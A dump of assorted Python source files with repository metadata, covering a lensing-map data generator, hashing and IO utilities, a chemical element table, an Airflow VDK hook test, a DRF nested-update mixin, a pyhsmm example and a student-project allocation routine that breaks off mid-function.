X_train, X_test, y_train, y_test = load_sparse_grid(imsize=mapsize,
from_files=from_files)
elif grfized:
# equivalent gaussian random filed maps
assert not from_files
X_train, X_test, y_train, y_test = load_grf_sparse_grid()
elif dense_grid:
assert not from_files
# data with additional points around a cosmology
X_train, X_test, y_train, y_test = load_dense_grid(imsize=mapsize)
elif random_split:
# random train and test split
X_train, X_test, y_train, y_test = load_randomsplit_grid(
imsize=mapsize, from_files=from_files)
# aleays predict newidf, why not, it takes not time
# anyway we will not use it with the experiemnts
fn = '../../data/columbia_data_fiducial_new_idf_pix'+str(mapsize)+'.npy'
X_new_idf = np.load(fn)
y_new_idf = np.ones((len(y_test),2))
y_new_idf[:,0], y_new_idf[:,1] = 0.309, 0.816
if exclude_fid: # exclude fiducial cosmo params if asked for
idx = (y_train[:,0] == 0.309) & (y_train[:,1] == 0.816)
X_train, y_train = X_train[~idx], y_train[~idx]
return X_train, X_test, X_new_idf, y_train, y_test, y_new_idf
def load_sparse_grid(d='../../data/sparsegrid/', imsize = 512,
from_files=False):
if from_files: # only load filenames
X_train = np.arange(len(os.listdir(os.path.join(d, 'train'))))
X_test = np.arange(len(os.listdir(os.path.join(d, 'test'))))
else: # load the files themselves
X_train = np.load(d+'sparse_grid_final_'+str(imsize)+'pix_x_train.npy')
X_test = np.load(d+'sparse_grid_final_'+str(imsize)+'pix_x_test.npy')
y_train = np.load(d+'sparse_grid_final_'+str(imsize)+'pix_y_train.npy')
y_test = np.load(d+'sparse_grid_final_'+str(imsize)+'pix_y_test.npy')
return X_train, X_test, y_train, y_test
"""Loaders for various experiments."""
def load_grf_sparse_grid(d='../../data/grf/', case='a',imsize=512):
X_train = np.load(d+'grf'+case+'_sparse_grid_final_'+str(imsize)+'pix_x_train.npy')
X_test = np.load(d+'grf'+case+'_sparse_grid_final_'+str(imsize)+'pix_x_test.npy')
y_train = np.load(d+'grf_sparse_grid_final_'+str(imsize)+'pix_y_train.npy')
y_test = np.load(d+'grf_sparse_grid_final_'+str(imsize)+'pix_y_test.npy')
return X_train, X_test, y_train, y_test
def load_dense_grid(d='../../data/densegrid/', imsize = 512):
X_train = np.load(d+'dense_grid_final_'+str(imsize)+'pix_x_train.npy')
X_test = np.load(d+'dense_grid_final_'+str(imsize)+'pix_x_test.npy')
y_train = np.load(d+'dense_grid_final_'+str(imsize)+'pix_y_train.npy')
y_test = np.load(d+'dense_grid_final_'+str(imsize)+'pix_y_test.npy')
return X_train, X_test, y_train, y_test
def load_randomsplit_grid(d='../../data/randomsplit/sparse_512/', imsize = 512,
from_files=False):
if from_files: # only load filenames
X_train = np.arange(len(os.listdir(os.path.join(d, 'train'))))
X_test = np.arange(len(os.listdir(os.path.join(d, 'test'))))
else: # load the files themselves
X_train = np.load(d+'sparse_randomsplit_'+str(imsize)+'pix_x_train.npy')
X_test = np.load(d+'sparse_randomsplit_'+str(imsize)+'pix_x_test.npy')
y_train = np.load(d+'sparse_randomsplit_'+str(imsize)+'pix_y_train.npy')
y_test = np.load(d+'sparse_randomsplit_'+str(imsize)+'pix_y_test.npy')
return X_train, X_test, y_train, y_test
class DataGenerator():
"""
Data generator.
Generates minibatches of data and labels.
Usage:
from imgen import ImageGenerator
g = DataGenerator(data, labels)
"""
def __init__(self, x, y, batch_size=1, shuffle=True, seed=0,
ng=None, smoothing = None, map_size = 512,
y_shape = (2,), augment = False, scale = 60*3.5,
d = None, from_files=False):
"""Initialize data generator."""
self.x, self.y = x, y
self.from_files = from_files
self.d = d
self.batch_size = batch_size
self.x_shape, self.y_shape = (map_size, map_size, 1), y_shape
self.shuffle = shuffle
self.augment = augment
self.seed = seed
self.rng = np.random.RandomState(self.seed)
if not from_files:
assert x.shape[1] == x.shape[2] # rectangular!!!
self.A_pix = (float(scale)/map_size)**2
self.ng = ng
self.smoothing = smoothing
self.scale = float(scale)
self.n_data = len(x)
self.n_steps = len(x)//batch_size + (len(x) % batch_size > 0)
self.i = 0
self.reset_indices_and_reshuffle(force=True)
def reset_indices_and_reshuffle(self, force=False):
"""Reset indices and reshuffle images when needed."""
if self.i == self.n_data or force:
if self.shuffle:
self.index = self.rng.permutation(self.n_data)
else:
self.index = np.arange(self.n_data)
self.i = 0
def next(self):
"""Get next batch of images."""
x = np.zeros((self.batch_size,)+self.x_shape)
y = np.zeros((self.batch_size,)+self.y_shape)
for i in range(self.batch_size):
x[i],y[i] = self.next_one()
return x,y
def next_one(self):
"""Get next 1 image."""
# reset index, reshuffle if necessary
self.reset_indices_and_reshuffle()
# get next x
if not self.from_files: # simply index from array
x = self.x[self.index[self.i]]
else: # load from file
fn = str(self.x[self.index[self.i]]) + '.npy'
x = np.load(os.path.join(self.d, fn))
x = self.process_map(x)
y = self.y[[self.index[self.i]]]
self.i += 1 # increment counter
return x, y
def process_map(self, x_in):
"""Process data."""
x = np.array([x_in],copy=True)
if self.augment: # flip and transpose
x = aug_ims(x, self.rng.rand()>0.5, self.rng.rand()>0.5,
self.rng.rand()>0.5)
if self.ng: # add noise if ng is not None
x = add_shape_noise(x, self.A_pix, self.ng, self.rng)
if self.smoothing: # smooth if smoothing is not None
x[0,:,:,0] = smooth(x[0,:,:,0], self.smoothing, self.scale)
return x
def predict_on_generator(model, datagen, augment):
"""Predict on data generator with augmentation."""
datagen.reset_indices_and_reshuffle(force=True)
y_true, y_pred = [],[]
for i in range(datagen.n_data):
xi,yi = datagen.next()
y_true.append(yi)
y_pred_tmp = np.zeros(yi.shape)
if augment:
for ai in [0,1]:
for aj in [0,1]:
for ak in [0,1]:
y_pred_tmp += model.predict_on_batch(
aug_ims(xi,ai,aj,ak))
y_pred.append(y_pred_tmp/8.)
else:
y_pred.append(model.predict_on_batch(xi))
y_true = np.vstack(y_true)
y_pred = np.vstack(y_pred)
return y_true, y_pred
def aug_ims(ims, fliplr=0, flipud=0, T=0):
"""Augment images with flips and transposition."""
ims_aug = np.array(ims, copy=True)
for i in range(len(ims_aug)):
if fliplr: # flip left right
ims_aug[i] = np.fliplr(ims_aug[i])
if flipud: # flip up down
ims_aug[i] = np.flipud(ims_aug[i])
if T: # transpose
ims_aug[i,:,:,0] = ims_aug[i,:,:,0].T
return ims_aug
def add_shape_noise(x, A, ng, rng=None, sige=0.4):
"""Add shape noise"""
sigpix = sige / (2 * A * ng)**0.5 # final pixel noise scatter
# add shape noise to map
if rng: # use given random generator
return x + rng.normal(loc=0, scale=sigpix, size=x.shape)
else: # or just a random noise
return x + np.random.normal(loc=0, scale=sigpix, size=x.shape)
def smooth(x, smoothing_scale_arcmin, map_size_arcmin):
"""Smooth by Gaussian kernel."""
# smoothing kernel width in pixels instead of arcmins
map_size_pix = x.shape[0]
s = (smoothing_scale_arcmin * map_size_pix) / map_size_arcmin
# cut off at: 6 sigma + 1 pixel
# for large smooothing area and odd pixel number
cutoff = 6 * int(s+1) + 1
return cv2.GaussianBlur(x, ksize=(cutoff, cutoff), sigmaX=s, sigmaY=s)
| 37.179688 | 87 | 0.604434 | 3,064 | 0.321916 | 0 | 0 | 0 | 0 | 0 | 0 | 2,544 | 0.267283 |
f1e232b6730dde2945dc690b0f6fddabcc0f6b8b
| 4,683 |
py
|
Python
|
bert/utils/common.py
|
rschoon/bert
|
5aeb394dd7c1fcf5995d2f7cd6a25ef3ac81ce13
|
[
"MIT"
] | null | null | null |
bert/utils/common.py
|
rschoon/bert
|
5aeb394dd7c1fcf5995d2f7cd6a25ef3ac81ce13
|
[
"MIT"
] | null | null | null |
bert/utils/common.py
|
rschoon/bert
|
5aeb394dd7c1fcf5995d2f7cd6a25ef3ac81ce13
|
[
"MIT"
] | null | null | null |
import hashlib
import io
import json
import os
import re
import struct
def decode_bin(s, encoding=None):
if encoding is None:
encoding = "utf-8"
if encoding in ("bin", "binary", "bytes", "raw"):
return s
return s.decode(encoding)
class open_output(object):
def __init__(self, filename, mode="wb"):
self._dirname = os.path.dirname(filename)
self.filename = str(filename)
self._tmpname = self.filename+".tmp"
self.mode = mode
self._fileobj = None
def __enter__(self):
if self._dirname:
os.makedirs(self._dirname, exist_ok=True)
self._fileobj = open(self._tmpname, self.mode)
return self._fileobj
def __exit__(self, type, value, tb):
self.close(value is None)
def close(self, commit=True):
if self._fileobj is not None:
self._fileobj.close()
if commit:
os.rename(self._tmpname, self.filename)
else:
os.unlink(self._tmpname)
self._fileobj = None
def expect_file_mode(mode, _sub_mode_re=re.compile('^(u|g|o)=([rwx]+)$')):
if mode is None or mode == "":
return None
if isinstance(mode, int):
return mode
modes = mode.split(",")
rv = 0
for sm in modes:
m = _sub_mode_re.match(sm)
if not m:
raise ValueError('Invalud mode value %s in %s' % (sm, mode))
shift = ("o", "g", "u").index(m.group(1))*3
bits = 0
for bi in m.group(2):
bits |= 2**('x', 'w', 'r').index(bi)
rv |= (bits << shift)
return rv
def json_hash(name, value):
h = hashlib.new(name)
h.update(json.dumps(value, sort_keys=True).encode('utf-8'))
return h.hexdigest()
def _file_hash(name, filename, chunk_size=2**16):
h = hashlib.new(name)
sz = 0
with open(filename, "rb") as f:
while True:
chunk = f.read()
if not chunk:
break
sz += len(chunk)
h.update(chunk)
return h, sz
def file_hash(name, filename):
filename = os.fspath(filename)
if os.path.isfile(filename):
h, _ = _file_hash(name, filename)
return h.hexdigest()
h = hashlib.new(name)
dirs = [filename]
while dirs:
dirs = sorted(dirs)
dirname = dirs.pop()
for n in os.listdir(dirname):
fn = os.path.join(dirname, n)
if os.path.isdir(fn):
dirs.append(fn)
else:
fn_u8 = fn.encode('utf-8')
h.update(struct.pack('L', len(fn_u8)))
h.update(fn_u8)
hf, sf = _file_hash(name, fn)
h.update(struct.pack('Q', sf))
h.update(hf.digest())
return h.hexdigest()
def value_hash(name, value):
h = hashlib.new(name)
if isinstance(value, str):
value = value.encode('utf-8')
h.update(value)
return h.hexdigest()
class IOHashWriter(io.IOBase):
def __init__(self, hash_name, fileobj):
if not fileobj.writable():
raise ValueError("IOHashWriter requires writable fileobj")
self._h = hashlib.new(hash_name)
self._inner = fileobj
def digest(self):
return self._h.digest()
def hexdigest(self):
return self._h.hexdigest()
@property
def closed(self):
return self._inner.closed
def close(self):
pass
def fileno(self):
return self._inner.fileno()
def seek(self):
raise OSError("Not seekable")
def seekable(self):
return False
def tell(self):
return self._inner.tell()
def readable(self):
return False
def truncate(self, size=None):
raise OSError("Not truncatable")
def writable(self):
return self._inner.writable()
def write(self, b):
self._h.update(b)
return self._inner.write(b)
class TeeBytesWriter(io.RawIOBase):
def __init__(self, *fileobjs):
self.fileobjs = fileobjs
self.offset = 0
def readable(self):
return False
def tell(self):
return self.offset
def write(self, b):
self.offset += len(b)
for f in self.fileobjs:
f.write(b)
class IOFromIterable(io.RawIOBase):
def __init__(self, iterable):
self._iter = iter(iterable)
self._pos = 0
def readinto(self, buf):
try:
chunk = next(self._iter)
except StopIteration:
return 0
sz = len(chunk)
buf[:sz] = chunk
self._pos += sz
return sz
def tell(self):
return self._pos
| 23.771574 | 74 | 0.558189 | 2,494 | 0.532565 | 0 | 0 | 65 | 0.01388 | 0 | 0 | 216 | 0.046124 |
f1e2aa05c0131a4119034421ecbeb1cb9810d8c8
| 2,080 |
py
|
Python
|
boaphys/elements.py
|
janpipek/boaphys
|
f32d972e22ebede2f24bf69506125b7c59a4c8c0
|
[
"MIT"
] | null | null | null |
boaphys/elements.py
|
janpipek/boaphys
|
f32d972e22ebede2f24bf69506125b7c59a4c8c0
|
[
"MIT"
] | null | null | null |
boaphys/elements.py
|
janpipek/boaphys
|
f32d972e22ebede2f24bf69506125b7c59a4c8c0
|
[
"MIT"
] | null | null | null |
class Element:
def __init__(self, name : str, symbol : str, Z : int):
self.name = name
self.symbol = symbol
self.Z = Z
def __repr__(self):
return "Element(\"{0}\", Z={1})".format(self.name, self.Z)
def __str__(self):
return self.symbol
class _Table:
def __init__(self):
self._data = [
Element("Hydrogen", "H", 1),
Element("Helium", "He", 2),
Element("Lithium", "Li", 3),
Element("Beryllium", "Be", 4)
]
for element in self._data:
setattr(self, element.symbol, element)
setattr(self, element.name, element)
def __getitem__(self, x):
if isinstance(x, int):
return next((element for element in self._data if element.Z == x), None)
elif isinstance(x, str):
if len(x) <= 2:
return next((element for element in self._data if element.symbol == x), None)
else:
return next((element for element in self._data if element.name == x), None)
else:
raise IndexError()
def __iter__(self):
return iter(self._data)
table = _Table()
class Isotope:
def __init__(self, element, A : int):
self.element = as_element(element)
self.A = A
def __getattr__(self, name):
return getattr(self.element, name)
def __str__(self):
return "{0}-{1}".format(self.element.symbol, self.A)
@property
def Z(self) -> int:
return self.element.Z
@property
def N(self) -> int:
"""Number of neutrons."""
return self.A - self.Z
def as_element(a):
if isinstance(a, Element):
return a
else:
return table[a]
def as_isotope(a):
if isinstance(a, Isotope):
return a
if isinstance(a, (tuple, list)):
return Isotope(*a)
if isinstance(a, str):
raise NotImplementedError()
| 27.012987 | 93 | 0.516827 | 1,693 | 0.813942 | 0 | 0 | 161 | 0.077404 | 0 | 0 | 112 | 0.053846 |
f1e338fa1474985107d12ea6bcd66b88abed94fc
| 2,924 |
py
|
Python
|
projects/vdk-plugins/airflow-provider-vdk/tests/hooks/test_vdkhook.py
|
vmware/versatile-data-kit
|
c4e10324a4f3203c58079cb18203880f68053f15
|
[
"Apache-2.0"
] | 100 |
2021-10-04T09:32:04.000Z
|
2022-03-30T11:23:53.000Z
|
projects/vdk-plugins/airflow-provider-vdk/tests/hooks/test_vdkhook.py
|
vmware/versatile-data-kit
|
c4e10324a4f3203c58079cb18203880f68053f15
|
[
"Apache-2.0"
] | 208 |
2021-10-04T16:56:40.000Z
|
2022-03-31T10:41:44.000Z
|
projects/vdk-plugins/airflow-provider-vdk/tests/hooks/test_vdkhook.py
|
vmware/versatile-data-kit
|
c4e10324a4f3203c58079cb18203880f68053f15
|
[
"Apache-2.0"
] | 14 |
2021-10-11T14:15:13.000Z
|
2022-03-11T13:39:17.000Z
|
# Copyright 2021 VMware, Inc.
# SPDX-License-Identifier: Apache-2.0
import logging
import unittest
from unittest import mock
from vdk.plugin.control_api_auth.authentication import Authentication
from vdk_provider.hooks.vdk import VDKHook
log = logging.getLogger(__name__)
# Monkey-patch the authentication logic to allow for more granular testing
# of the VDKHook
class PatchedAuth(Authentication):
def read_access_token(self) -> str:
return "test1token"
class TestVDKHook(unittest.TestCase):
@mock.patch.dict(
"os.environ", AIRFLOW_CONN_CONN_VDK="http://https%3A%2F%2Fwww.vdk-endpoint.org"
)
def setUp(self):
self.hook = VDKHook(
conn_id="conn_vdk",
job_name="test_job",
team_name="test_team",
auth=PatchedAuth(),
)
@mock.patch("taurus_datajob_api.api_client.ApiClient.call_api")
def test_start_job_execution(self, mock_call_api):
mock_call_api.return_value = (None, None, {"Location": "job-execution-id-01"})
self.hook.start_job_execution()
assert (
mock_call_api.call_args_list[0][0][0]
== "/data-jobs/for-team/{team_name}/jobs/{job_name}/deployments/{deployment_id}/executions"
and mock_call_api.call_args_list[0][0][1] == "POST"
and mock_call_api.call_args_list[0][0][2]
== {
"team_name": "test_team",
"job_name": "test_job",
"deployment_id": "production",
}
)
@mock.patch("taurus_datajob_api.api_client.ApiClient.request")
def test_cancel_job_execution(self, mocked_api_client_request):
request_url = "https://www.vdk-endpoint.org/data-jobs/for-team/test_team/jobs/test_job/executions/test_execution_id"
self.hook.cancel_job_execution("test_execution_id")
assert mocked_api_client_request.call_args_list[0][0] == ("DELETE", request_url)
@mock.patch("taurus_datajob_api.api_client.ApiClient.deserialize")
@mock.patch("taurus_datajob_api.api_client.ApiClient.request")
def test_get_job_execution_status(self, mocked_api_client_request, _):
request_url = "https://www.vdk-endpoint.org/data-jobs/for-team/test_team/jobs/test_job/executions/test_execution_id"
self.hook.get_job_execution_status("test_execution_id")
assert mocked_api_client_request.call_args_list[0][0] == ("GET", request_url)
@mock.patch("taurus_datajob_api.api_client.ApiClient.deserialize")
@mock.patch("taurus_datajob_api.api_client.ApiClient.request")
def test_get_job_execution_log(self, mocked_api_client_request, _):
request_url = "https://www.vdk-endpoint.org/data-jobs/for-team/test_team/jobs/test_job/executions/test_execution_id/logs"
self.hook.get_job_execution_log("test_execution_id")
assert mocked_api_client_request.call_args_list[0][0] == ("GET", request_url)
| 38.986667 | 129 | 0.703146 | 2,552 | 0.872777 | 0 | 0 | 2,384 | 0.815321 | 0 | 0 | 1,137 | 0.388851 |
f1e3adf84f989f48fb009dcc9e422f44d758219c
| 720 |
py
|
Python
|
skater/util/logger.py
|
RPUTHUMA/Skater
|
317460b88065b41eebe6790e9efdbb0595cbe450
|
[
"UPL-1.0"
] | 718 |
2017-05-19T22:49:40.000Z
|
2019-03-27T06:40:54.000Z
|
skater/util/logger.py
|
quant1729/Skater
|
b46a4abe3465ddc7b19ffc762ad45d1414b060a6
|
[
"UPL-1.0"
] | 114 |
2017-05-24T16:55:59.000Z
|
2019-03-27T12:48:18.000Z
|
skater/util/logger.py
|
quant1729/Skater
|
b46a4abe3465ddc7b19ffc762ad45d1414b060a6
|
[
"UPL-1.0"
] | 121 |
2017-05-22T17:20:19.000Z
|
2019-03-21T15:06:19.000Z
|
"""Funcs for logging"""
import logging
_CRITICAL = logging.CRITICAL
_ERROR = logging.ERROR
_WARNING = logging.WARNING
_INFO = logging.INFO
_DEBUG = logging.DEBUG
_NOTSET = logging.NOTSET
def build_logger(log_level, logger_name, capture_warning=True):
logger = logging.Logger(logger_name)
# All warnings are logged by default
logging.captureWarnings(capture_warning)
logger.setLevel(log_level)
msg_formatter = logging.Formatter(
'%(asctime)s - %(name)s - %(levelname)s - %(message)s'
)
stream_handler = logging.StreamHandler()
stream_handler.setFormatter(msg_formatter)
stream_handler.setFormatter(msg_formatter)
logger.addHandler(stream_handler)
return logger
| 24 | 63 | 0.740278 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 113 | 0.156944 |
f1e59d1d38ade7999a6cd5e7982c060b5e15cc11
| 575 |
py
|
Python
|
algorithms/code/leetcode/lc217_contains_duplicate/lc217_contains_duplicate.py
|
altermarkive/training
|
6a13f5b2f466156ad5db0e25da0e601d2404b4c3
|
[
"MIT"
] | null | null | null |
algorithms/code/leetcode/lc217_contains_duplicate/lc217_contains_duplicate.py
|
altermarkive/training
|
6a13f5b2f466156ad5db0e25da0e601d2404b4c3
|
[
"MIT"
] | 1 |
2022-02-16T11:28:56.000Z
|
2022-02-16T11:28:56.000Z
|
algorithms/code/leetcode/lc217_contains_duplicate/lc217_contains_duplicate.py
|
altermarkive/training
|
6a13f5b2f466156ad5db0e25da0e601d2404b4c3
|
[
"MIT"
] | null | null | null |
#!/usr/bin/env python3
# https://leetcode.com/problems/contains-duplicate/
import unittest
from typing import List
class Solution:
def containsDuplicate(self, nums: List[int]) -> bool:
seen = set()
for num in nums:
if num in seen:
return True
seen.add(num)
return False
class TestCode(unittest.TestCase):
def test_0_5_7(self):
self.assertFalse(Solution().containsDuplicate([0, 5, 7]))
def test_0_5_7_5_10(self):
self.assertTrue(Solution().containsDuplicate([0, 5, 7, 5, 10]))
| 23 | 71 | 0.626087 | 452 | 0.786087 | 0 | 0 | 0 | 0 | 0 | 0 | 73 | 0.126957 |
f1e6fe5da799ee54688ff5ee8d7c10fc529546e8
| 1,818 |
py
|
Python
|
examples/hsmm-geo.py
|
bikash/pyhsmm
|
94fab0ea66072a639b20163c40db04c18069496c
|
[
"MIT"
] | 1 |
2015-11-08T05:20:39.000Z
|
2015-11-08T05:20:39.000Z
|
examples/hsmm-geo.py
|
bikash/pyhsmm
|
94fab0ea66072a639b20163c40db04c18069496c
|
[
"MIT"
] | null | null | null |
examples/hsmm-geo.py
|
bikash/pyhsmm
|
94fab0ea66072a639b20163c40db04c18069496c
|
[
"MIT"
] | null | null | null |
from __future__ import division
import numpy as np
np.seterr(divide='ignore') # these warnings are usually harmless for this code
from matplotlib import pyplot as plt
import copy, os
import pyhsmm
from pyhsmm.util.text import progprint_xrange
###################
# generate data #
###################
T = 1000
obs_dim = 2
N = 4
obs_hypparams = {'mu_0':np.zeros(obs_dim),
'sigma_0':np.eye(obs_dim),
'kappa_0':0.25,
'nu_0':obs_dim+2}
dur_hypparams = {'alpha_0':10*1,
'beta_0':10*100}
true_obs_distns = [pyhsmm.distributions.Gaussian(**obs_hypparams)
for state in range(N)]
true_dur_distns = [pyhsmm.distributions.GeometricDuration(**dur_hypparams)
for state in range(N)]
truemodel = pyhsmm.models.GeoHSMM(
alpha=6.,
init_state_concentration=6.,
obs_distns=true_obs_distns,
dur_distns=true_dur_distns)
data, labels = truemodel.generate(T)
plt.figure()
truemodel.plot()
temp = np.concatenate(((0,),truemodel.states_list[0].durations.cumsum()))
changepoints = zip(temp[:-1],temp[1:])
changepoints[-1] = (changepoints[-1][0],T) # because last duration might be censored
#########################
# posterior inference #
#########################
Nmax = 25
obs_distns = [pyhsmm.distributions.Gaussian(**obs_hypparams) for state in range(Nmax)]
dur_distns = [pyhsmm.distributions.GeometricDuration(**dur_hypparams) for state in range(Nmax)]
posteriormodel = pyhsmm.models.GeoHSMMPossibleChangepoints(
alpha=6.,
init_state_concentration=6.,
obs_distns=obs_distns,
dur_distns=dur_distns)
posteriormodel.add_data(data,changepoints=changepoints)
for idx in progprint_xrange(50):
posteriormodel.resample_model()
plt.figure()
posteriormodel.plot()
plt.show()
| 25.25 | 95 | 0.669417 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 279 | 0.153465 |
f1e7704fa789f92ccdaa67ed757a654c38ed5fda
| 2,644 |
py
|
Python
|
drf_nested/mixins/update_nested_mixin.py
|
promoteinternational/drf-nested
|
0042b9e4c100df4ae43a10684c30348160b39187
|
[
"MIT"
] | 1 |
2020-01-05T07:23:48.000Z
|
2020-01-05T07:23:48.000Z
|
drf_nested/mixins/update_nested_mixin.py
|
promoteinternational/drf-nested
|
0042b9e4c100df4ae43a10684c30348160b39187
|
[
"MIT"
] | null | null | null |
drf_nested/mixins/update_nested_mixin.py
|
promoteinternational/drf-nested
|
0042b9e4c100df4ae43a10684c30348160b39187
|
[
"MIT"
] | 2 |
2019-08-12T07:36:57.000Z
|
2019-11-30T01:40:30.000Z
|
from django.db import transaction
from rest_framework.exceptions import ValidationError
from .base_nested_mixin import BaseNestedMixin
class UpdateNestedMixin(BaseNestedMixin):
@transaction.atomic
def update(self, instance, validated_data):
"""
:param instance:
:param validated_data:
:return:
"""
self._errors = {}
if self._has_nested_fields(validated_data):
validated_data, nested_fields_data = self._get_nested_fields(validated_data, remove_fields=True)
nested_field_types = self.extract_nested_types(nested_fields_data)
# Updating or creating direct relations like ForeignKeys before we create initial instance
for field in nested_field_types["direct_relations"]:
field_name = field.get('name')
field_data = field.get('data')
if isinstance(field_data, dict):
nested_instance = self._update_or_create_direct_relations(field_name, field_data)
validated_data[field.get("original_name")] = nested_instance
elif field_data is None:
validated_data[field.get("original_name")] = field_data
model_instance = super().update(instance, validated_data)
# Updating or creating reversed relations like the models that have the current model as ForeignKeys
# using created initial instance
for field in nested_field_types["reverse_relations"]:
field_name = field.get('name')
field_data = field.get('data')
self._update_or_create_reverse_relation(field_name, field_data, model_instance)
# Updating or creating generic relations using created initial instance
for field in nested_field_types["generic_relations"]:
field_name = field.get('name')
field_data = field.get('data')
self._update_or_create_generic_relation(field_name, field_data, model_instance)
# Updating or creating many-to-many relations using created initial instance
for field in nested_field_types["many_to_many_fields"]:
field_name = field.get('name')
field_data = field.get('data')
self._update_or_create_many_to_many_field(field_name, field_data, model_instance)
if self._errors:
raise ValidationError(self._errors)
else:
model_instance = super().update(instance, validated_data)
model_instance.refresh_from_db()
return model_instance
| 44.066667 | 112 | 0.655825 | 2,505 | 0.947428 | 0 | 0 | 2,459 | 0.93003 | 0 | 0 | 612 | 0.231467 |
f1e8ea63244e88c3991257407c19f60101c1fe1a
| 27 |
py
|
Python
|
sbpack/version.py
|
jdidion/sbpack
|
84bd7867a0630a826280a702db715377aa879f6a
|
[
"Apache-2.0"
] | 11 |
2020-08-12T09:33:46.000Z
|
2022-02-18T15:27:26.000Z
|
sbpack/version.py
|
jdidion/sbpack
|
84bd7867a0630a826280a702db715377aa879f6a
|
[
"Apache-2.0"
] | 35 |
2020-06-12T16:52:36.000Z
|
2022-03-25T04:29:02.000Z
|
sbpack/version.py
|
jdidion/sbpack
|
84bd7867a0630a826280a702db715377aa879f6a
|
[
"Apache-2.0"
] | 2 |
2021-09-27T16:17:26.000Z
|
2022-01-12T22:18:12.000Z
|
__version__ = "2021.10.07"
| 13.5 | 26 | 0.703704 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 12 | 0.444444 |
f1e91dba84a62775f1e1edc376c14039a6a6b66f
| 179 |
py
|
Python
|
forayer/datasets/__init__.py
|
dobraczka/forayer
|
df6783f85fb063f58e8b96acef924f9fd2532227
|
[
"MIT"
] | 5 |
2021-09-06T13:50:44.000Z
|
2022-02-14T09:39:09.000Z
|
forayer/datasets/__init__.py
|
dobraczka/forayer
|
df6783f85fb063f58e8b96acef924f9fd2532227
|
[
"MIT"
] | 5 |
2021-09-07T06:53:41.000Z
|
2022-01-17T09:51:53.000Z
|
forayer/datasets/__init__.py
|
dobraczka/forayer
|
df6783f85fb063f58e8b96acef924f9fd2532227
|
[
"MIT"
] | null | null | null |
"""Make datasets available."""
from forayer.datasets.oaei_kg import OAEIKGDataset
from forayer.datasets.open_ea import OpenEADataset
__all__ = ["OpenEADataset", "OAEIKGDataset"]
| 29.833333 | 50 | 0.804469 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 60 | 0.335196 |
f1ed8dbfedb221a10fa60ea9b89b4d29afac3606
| 227 |
py
|
Python
|
challenge/admin.py
|
dpmpolo/anniv
|
27081ca5bc514050c10ecc5e5c0994a4d5a7066f
|
[
"MIT"
] | null | null | null |
challenge/admin.py
|
dpmpolo/anniv
|
27081ca5bc514050c10ecc5e5c0994a4d5a7066f
|
[
"MIT"
] | null | null | null |
challenge/admin.py
|
dpmpolo/anniv
|
27081ca5bc514050c10ecc5e5c0994a4d5a7066f
|
[
"MIT"
] | null | null | null |
from django.contrib import admin
from challenge.models import Goal, GoalInstance, SignificantOther
# Register your models here.
admin.site.register(Goal)
admin.site.register(GoalInstance)
admin.site.register(SignificantOther)
| 28.375 | 65 | 0.837004 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 28 | 0.123348 |
f1ee53bc0c6e33469f0d38aac5f3576590fc8660
| 14,142 |
py
|
Python
|
allocate.py
|
tomdavsmi/ncl-spa
|
baa714071d18cc388ccc73702d78a53f7096db6e
|
[
"MIT"
] | null | null | null |
allocate.py
|
tomdavsmi/ncl-spa
|
baa714071d18cc388ccc73702d78a53f7096db6e
|
[
"MIT"
] | null | null | null |
allocate.py
|
tomdavsmi/ncl-spa
|
baa714071d18cc388ccc73702d78a53f7096db6e
|
[
"MIT"
] | null | null | null |
import library
import random
import re
def allocate(studPrefs,unassignedStudents,lecturerprefs,projLects,lectProjs,lecturercaps,projCaps,randomise,updates,iterationLimit):
# Create projected preference list - first pass; add students not on lecturer's list
for k, v in studPrefs.items():
for project in v:
idx = library.firstidx(lecturerprefs[projLects[project]],k)
if idx == -1:
lecturerprefs[projLects[project]].append(k)
projectedPrefs = {}
# Create projected preference list - second pass; add students to projected list
for k, v in projLects.items():
for student in lecturerprefs[v]:
if library.firstidx(studPrefs[student], k) > -1:
if k not in projectedPrefs:
projectedPrefs.update({k: []})
projectedPrefs[k].append(student)
else:
projectedPrefs[k].append(student)
maxidx = 0
done = 0
iters = 0
projAssignments = dict()
lectAssignments = dict()
studAssignments = dict()
nProj = 0
currentStudent = ""
while done != 1:
iters += 1
if randomise == 1:
random.shuffle(unassignedStudents)
if iters > iterationLimit & iterationLimit != -1:
print("Maximum number of iterations "+str(iterationLimit)+" before convergence")
done = 1
if len(unassignedStudents) > 0:
for value in unassignedStudents:
currentStudent = value
nProj = len(studPrefs[currentStudent])
if nProj > 0:
break
if nProj > 0: ### We have a student who still has projects in their list - heart of the alogrithm
currentProject = studPrefs[currentStudent][0]
currentLecturer = projLects[currentProject]
if currentProject not in projAssignments:
projAssignments.update({currentProject:[]})
projAssignments[currentProject].append(currentStudent)
else:
projAssignments[currentProject].append(currentStudent)
if currentLecturer not in lectAssignments:
lectAssignments.update({currentLecturer:[]})
lectAssignments[currentLecturer].append(currentStudent)
else:
lectAssignments[currentLecturer].append(currentStudent)
studAssignments.update({currentStudent:currentProject})
idx = library.firstidx(unassignedStudents,currentStudent)
unassignedStudents.pop(idx)
if updates == True:
print(str(iters)+" : Assigned "+currentStudent+" to project "+currentProject+" with supervisor "+currentLecturer+"\n")
#Is the project the student was just assigned to overloaded?
if len(projAssignments[currentProject]) > int(projCaps[currentProject]):
maxidx = -1
for value in projAssignments[currentProject]:
idx = library.firstidx(projectedPrefs[currentProject], value)
if idx == -1:
maxidx = idx
worst = value
break
if idx > maxidx:
maxidx = idx
worst = value
if updates == True:
print("Project " + currentProject + " is overloaded. Removing " + worst + ".\n")
idx = library.firstidx(lectAssignments[currentLecturer],worst)
lectAssignments[currentLecturer].pop(idx)
idx = library.firstidx(projAssignments[currentProject],worst)
projAssignments[currentProject].pop(idx)
if worst not in unassignedStudents:
unassignedStudents.append(worst)
if worst in studAssignments:
studAssignments.pop(worst)
#Is the lecturer of the project the student was just assigned to overloaded?
if len(lectAssignments[currentLecturer]) > int(lecturercaps[currentLecturer]):
maxidx = -1
for value in lectAssignments[currentLecturer]:
idx = library.firstidx(lecturerprefs[currentLecturer],value)
if idx == -1:
maxidx = idx
worst = value
break
if idx > maxidx:
maxidx = idx
worst = value
if updates == True:
print("Lecturer " + currentLecturer + " is overloaded. Removing " + worst + ".\n")
idx = library.firstidx(lectAssignments[currentLecturer], worst)
